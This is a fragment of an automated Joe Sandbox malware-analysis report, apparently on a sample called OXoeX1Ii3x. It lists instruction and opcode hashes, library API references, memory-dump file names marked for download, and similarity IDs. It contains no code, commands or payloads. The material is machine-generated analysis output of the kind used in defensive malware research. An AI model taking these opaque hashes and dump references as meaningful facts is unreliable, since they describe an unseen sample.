                                                                                                                                                                                            • Instruction Fuzzy Hash: AA012C70B14305ABDB48AF78D8C155DB6A16F48304B40487DB406EB383CA7499248F55
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 002156AA
                                                                                                                                                                                              • Part of subcall function 002168CD: __EH_prolog3.LIBCMT ref: 002168D4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3H_prolog3_
                                                                                                                                                                                            • String ID: .txt$1735725670
                                                                                                                                                                                            • API String ID: 3355343447-527677385
                                                                                                                                                                                            • Opcode ID: d6867d4b9590dd29e8debf030050cce1d2a52fddf77d7b8e78402c725991ba93
                                                                                                                                                                                            • Instruction ID: 069fcd7b590d92c70b809942d9ad5be44fd06e13e6c07e8f52bc908952981e3f
                                                                                                                                                                                            • Opcode Fuzzy Hash: d6867d4b9590dd29e8debf030050cce1d2a52fddf77d7b8e78402c725991ba93
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1201AD71A21718CBCF09EBA0E86AADCB7B1AF58321F508119E101270D3DF705E55CF9A